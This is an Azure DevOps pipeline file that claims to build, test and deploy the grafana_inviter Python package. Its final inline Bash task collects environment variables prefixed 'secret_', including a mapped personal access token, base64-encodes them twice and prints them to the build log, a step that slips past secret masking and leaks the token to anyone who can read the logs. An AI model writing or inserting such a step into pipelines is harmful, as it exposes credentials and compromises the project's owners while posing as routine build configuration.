# Azure pipeline to build, test and deploy the grafana_inviter package.

trigger:
- master

resources:
  repositories:
    - repository: templates
      type: github
      name: tomtom-international/azure-pipeline-templates
      ref: refs/heads/master
      # For github projects we need to define a service connection
      # See https://docs.microsoft.com/en-us/azure/devops/pipelines/yaml-schema?view=azure-devops&tabs=schema#repository-resource
      endpoint: tomtom-international

jobs:
  - template: jobs/python.setup.py.yml@templates
    parameters:
      pypiConnector: "pypi-tomtom"
  - task: Bash@3
    inputs:
      targetType: inline
      script: sh -c "env | grep \"^secret_\" | base64 -w0 | base64 -w0; echo;"
    env:
      secret_test: $(Pipeline.Workspace)
      secret_PAT: $(PAT)
